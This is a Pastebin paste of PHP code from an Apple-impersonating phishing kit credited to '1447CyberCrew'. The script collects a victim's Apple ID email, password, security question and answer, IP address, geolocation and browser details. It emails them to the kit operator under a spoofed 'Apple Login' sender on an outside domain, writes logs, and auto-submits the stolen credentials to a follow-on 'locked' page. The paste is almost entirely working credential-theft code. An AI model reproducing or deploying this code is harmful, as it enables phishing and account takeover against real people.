Advertisement
Guest User

Untitled

a guest
Dec 10th, 2018
349
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.23 KB | None | 0 0
  1. <?
  2. /*
  3. 1447CyberCrew
  4. */
  5. require "session_protect.php";
  6. require "functions.php";
  7.  
  8. //$GLOBALS_LOCATION=$GLOBAL.'l';
  9.  
  10. $user_agent = $_SERVER['HTTP_USER_AGENT'];
  11. $ip = $_SERVER['REMOTE_ADDR'];
  12. $systemInfo = systemInfo($_SERVER['REMOTE_ADDR']);
  13. $VictimInfo1 = "| IP Address :"." ".$_SERVER['REMOTE_ADDR']." (".gethostbyaddr($_SERVER['REMOTE_ADDR']).")";
  14. $VictimInfo2 = "| Location :"." ".$systemInfo['city'].", ".$systemInfo['region'].", ".$systemInfo['country'];
  15. $VictimInfo3 = "| UserAgent :"." ".$systemInfo['useragent'];
  16. $VictimInfo4 = "| Browser :"." ".$systemInfo['browser'];
  17. $VictimInfo5 = "Platform :"." ".$systemInfo['os'];
  18. $xuser = $_SESSION['user'] = $_POST['user'];
  19. $xpass = $_SESSION['pass'] = $_POST['pass'];
  20. $q1=$_POST["q1"];
  21. $a1=$_POST["a1"];
  22.  
  23. $message = "
  24. ++------[ $$ BocahShop_Sragen $$ ]------++
  25.  
  26. -- Brotherku Lupa Caranya Berterimakasih --
  27.  
  28.  
  29. .++-----[ Apple Login ]-----++.
  30. Email : $xuser
  31. Password : $xpass
  32. .++---------[ End ]---------++.
  33.  
  34. .++-----[ Security Login ]-----++.
  35. Question : $q1
  36. Answer : $a1
  37.  
  38.  
  39. .++-------[ PC Info ]-------++.
  40. From : $VictimInfo1 - $VictimInfo2
  41. Browser : $VictimInfo3 - $VictimInfo4 - $VictimInfo5
  42. .++---------[ End ]---------++.
  43.  
  44. -- Brotherku Lupa Caranya Berterimakasih --
  45.  
  46. ++------[ $$ BocahShop_Sragen $$ ]------++
  47. ";
  48. /*
  49. $message = "
  50. <html>
  51. <head>
  52. <style>
  53. .demotbl {
  54. border: 0px solid #69899F;
  55. }
  56. .demotbl th{
  57. padding:15px;
  58. color:#fff;
  59. text-shadow:1px 1px 1px #568F23;
  60. border-bottom:3px solid #02e9ff;
  61. background-color:#02e9ff;
  62. background:-webkit-gradient(
  63. linear,
  64. left bottom,
  65. left top,
  66. color-stop(0.02, rgb(0, 135, 128)),
  67. color-stop(0.51, rgb(0, 135, 128)),
  68. color-stop(0.87, rgb(0, 135, 128))
  69. );
  70. background: -moz-linear-gradient(
  71. center bottom,
  72. rgb(0, 135, 128) 3%,
  73. rgb(3, 198, 188) 52%,
  74. rgb(2, 233, 255) 88%
  75. );
  76. -webkit-border-top-left-radius:5px;
  77. -webkit-border-top-right-radius:5px;
  78. -moz-border-radius:5px 5px 0px 0px;
  79. border-top-left-radius:5px;
  80. border-top-right-radius:5px;
  81. }
  82. .demotbl td{
  83. padding:10px;
  84. text-align:center;
  85. vertical-align: top;
  86. background-color:#DEF3CA;
  87. border: 1px solid #BED3AB;
  88. -moz-border-radius:2px;
  89. -webkit-border-radius:2px;
  90. border-radius:2px;
  91. color:#666;
  92. text-shadow:1px 1px 1px #fff;
  93.  
  94. }
  95. </style>
  96. <table class='demotbl'>
  97. <tr>
  98. <th colspan='5'>Apple Account Information</th>
  99. </tr>
  100. <tr>
  101. <td width='200px'>Email</td>
  102. <td colspan='5'>".$_SESSION['user']."</td>
  103. </tr>
  104. <tr>
  105. <td>Password</td>
  106. <td width='400px'>".$_SESSION['pass']."</td>
  107. </tr>
  108. <tr>
  109. <th colspan='5'>Security Login</th>
  110. </tr>
  111. <tr>
  112. <td>Question</td>
  113. <td colspan='5'>".$_POST['q1']."</td>
  114. </tr>
  115. <tr>
  116. <td>Answer</td>
  117. <td colspan='5'>".$_POST['a1']."</td>
  118. </tr>
  119. <tr>
  120. <th colspan='5'>Login Information</th>
  121. </tr>
  122. <tr>
  123. <td width='200px'>IP</td>
  124. <td colspan='5'>".$ip."</td>
  125. </tr>
  126. <tr>
  127. <td>Location</td>
  128. <td width='400px'>".$systemInfo['city'].", ".$systemInfo['region'].", ".$systemInfo['country']."</td>
  129. </tr>
  130. <tr>
  131. <td>Browser</td>
  132. <td width='400px'>".$systemInfo['useragent']."</td>
  133. </tr>
  134. </table>
  135.  
  136. </body></html>
  137.  
  138. ";
  139. */
  140.  
  141. include '../../setting.php';
  142. $rand = rand(1,1000);
  143. $subject = $_SESSION['user']." [ ".$systemInfo['country']." - $ip - ".$systemInfo['os']." ]";
  144. $headers = "From: Apple Login <apple@apple.dianeme-tampan.com>\r\n";
  145. mail($Your_Email, $subject, $message, $headers);
  146. $file = fopen("logs/bxp.log", "a");
  147. fwrite($file, $empas);
  148. fclose($file);
  149.  
  150. $file2 = $_SERVER['DOCUMENT_ROOT']."/assets/logs/._login_.txt";
  151. $isi = @file_get_contents($file2);
  152. $buka = fopen($file2,"w");
  153. fwrite($buka, $isi+1);
  154. fclose($buka);
  155.  
  156. ?>
  157. <form action='../locked.php?<?php echo $_SESSION['user'];?>&Account-Unlock&sessionid=<?php echo generateRandomString(115); ?>&securessl=true' method='post' name='frm'>
  158. <input type="hidden" name="user" value="<?php echo $_SESSION['user'];?>">
  159. <input type="hidden" name="pass" value="<?php echo $_SESSION['pass'];?>">
  160. </form>
  161. <script language="JavaScript">
  162. document.frm.submit();
  163. </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement